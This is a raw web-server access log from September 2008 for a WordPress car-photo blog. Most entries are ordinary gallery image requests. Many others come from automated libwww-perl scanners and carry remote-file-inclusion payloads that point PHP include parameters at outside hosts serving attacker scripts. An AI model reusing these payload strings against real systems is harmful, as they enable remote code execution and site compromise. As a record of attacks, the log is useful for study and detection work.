72.199.235.196 - - [20/Sep/2008:09:05:50 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:05:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-017_2.jpg HTTP/1.1" 200 453605 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:05:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-239.jpg HTTP/1.1" 200 549595 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:05:59 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/01d2_1.jpg HTTP/1.1" 200 23316 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:06:09 -0700] "GET /logs/access_080830.log//collect.php?neturl=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:11 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1014.jpg HTTP/1.1" 200 465585 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:12 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:13 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.253.223.90 - - [20/Sep/2008:09:06:13 -0700] "GET /logs/access_080417.log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:15 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:15 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/6697_1.jpg HTTP/1.1" 200 26779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.139.251.55 - - [20/Sep/2008:09:06:15 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.54.122 - - [20/Sep/2008:09:06:16 -0700] "GET /logs/access_080830.log//collect.php?neturl=http://webmail.cyber.it/forums/ecodellemissioni/cache/cx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.139.251.55 - - [20/Sep/2008:09:06:16 -0700] "GET /index.php?DOCUMENT_ROOT=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 200 92296 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:16 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:17 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-180_0.jpg HTTP/1.1" 200 354199 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:19 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:19 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:20 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:21 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:22 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
89.28.13.223 - - [20/Sep/2008:09:06:25 -0700] "GET /logs/access_080218.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://danieledm.altervista.org/PhP/id_osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:25 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:25 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1007.jpg HTTP/1.1" 200 267149 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
89.28.13.223 - - [20/Sep/2008:09:06:28 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://danieledm.altervista.org/PhP/id_osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
89.28.13.223 - - [20/Sep/2008:09:06:28 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://danieledm.altervista.org/PhP/id_osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:29 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/91ac_1.jpg HTTP/1.1" 200 26294 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0074.jpg HTTP/1.1" 200 466874 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:38 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1009.jpg HTTP/1.1" 200 366579 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:41 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/3dd5_1.jpg HTTP/1.1" 200 24788 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
89.28.13.223 - - [20/Sep/2008:09:06:41 -0700] "GET /logs/access_080302.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://danieledm.altervista.org/PhP/id_osirys.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149_0.jpg HTTP/1.1" 200 248840 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:51 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1020.jpg HTTP/1.1" 200 309098 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
63.247.78.2 - - [20/Sep/2008:09:06:51 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.247.78.2 - - [20/Sep/2008:09:06:53 -0700] "GET /index.php?DOCUMENT_ROOT=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 200 92296 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:53 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/707b_1.jpg HTTP/1.1" 200 25171 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:06:58 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-019_1.jpg HTTP/1.1" 200 350410 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.13.230.70 - - [20/Sep/2008:09:06:59 -0700] "GET /alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.netops-fr.info/remote/ident.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.230.70 - - [20/Sep/2008:09:06:59 -0700] "GET /logs/access_080505.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.netops-fr.info/remote/ident.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.230.70 - - [20/Sep/2008:09:06:59 -0700] "GET /logs/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.netops-fr.info/remote/ident.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:06 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1005.jpg HTTP/1.1" 200 271088 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:07 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/1fb0_1.jpg HTTP/1.1" 200 29325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
64.13.230.70 - - [20/Sep/2008:09:07:09 -0700] "GET /logs/access_080323.log/alex_guestbook3/include/livre_include.php?no_connect=lol&chem_absolu=http://www.netops-fr.info/remote/ident.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:07:10 -0700] "GET /logs/access_080327.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:07:10 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:07:10 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-107_0.jpg HTTP/1.1" 200 371028 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:07:19 -0700] "GET /logs/access_080727.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:22 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1023.jpg HTTP/1.1" 200 313610 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:22 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/334d_1.jpg HTTP/1.1" 200 25894 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-082.jpg HTTP/1.1" 200 430958 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:07:29 -0700] "GET /logs/access_080703.log/index.php?page=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:07:29 -0700] "GET /logs/index.php?page=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:07:30 -0700] "GET /index.php?page=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 200 92321 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:34 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/8795_1.jpg HTTP/1.1" 200 28396 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:34 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1012.jpg HTTP/1.1" 200 280752 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-014_2.jpg HTTP/1.1" 200 351687 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
207.99.69.218 - - [20/Sep/2008:09:07:45 -0700] "GET /logs/access.log/index.php?page=http://www.marketingsolutionsltd.com/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:46 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_1.jpg HTTP/1.1" 200 20783 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:49 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1025.jpg HTTP/1.1" 200 348080 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-157_1.jpg HTTP/1.1" 200 292161 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:07:58 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_2.jpg HTTP/1.1" 200 6928 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:01 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1017.jpg HTTP/1.1" 200 322953 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:06 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0126.jpg HTTP/1.1" 200 401657 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:09:08:08 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:09:08:09 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:09:08:09 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:10 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/51b6_1.jpg HTTP/1.1" 200 27832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:14 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1018.jpg HTTP/1.1" 200 338681 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:09:08:16 -0700] "GET /logs/access_080509.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:19 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1013.jpg HTTP/1.1" 200 340617 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:08:21 -0700] "GET /logs/access_080119.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.47.133.61 - - [20/Sep/2008:09:08:21 -0700] "GET /logs/access_080821.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:23 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/4783_1.jpg HTTP/1.1" 200 27415 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
24.47.133.61 - - [20/Sep/2008:09:08:24 -0700] "GET /logs/access_080821.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:26 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1024.jpg HTTP/1.1" 200 269847 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-195.jpg HTTP/1.1" 200 323860 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:35 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/7a5e_1.jpg HTTP/1.1" 200 23186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:39 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1016.jpg HTTP/1.1" 200 304849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:44 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_2.jpg HTTP/1.1" 200 538232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:51 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1015.jpg HTTP/1.1" 200 280431 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:08:52 -0700] "GET //poll/png.php?include_path=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:08:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-121_0.jpg HTTP/1.1" 200 474198 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:08:58 -0700] "GET /logs/access_080227.log//poll/png.php?include_path=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:08:58 -0700] "GET /logs//poll/png.php?include_path=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:10 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-111_1.jpg HTTP/1.1" 200 410836 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:09:11 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:09:12 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:09:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:17 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1019.jpg HTTP/1.1" 200 410938 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_1.jpg HTTP/1.1" 200 284519 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:31 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1021.jpg HTTP/1.1" 200 311999 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:09:36 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:09:09:39 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-083.jpg HTTP/1.1" 200 465831 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:46 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1004.jpg HTTP/1.1" 200 260222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:49 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=4&752 HTTP/1.1" 200 157653 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-157_0.jpg HTTP/1.1" 200 184299 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:51 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&640 HTTP/1.1" 200 6289 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:52 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 200 371716 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:09:52 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&109 HTTP/1.1" 200 19014 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
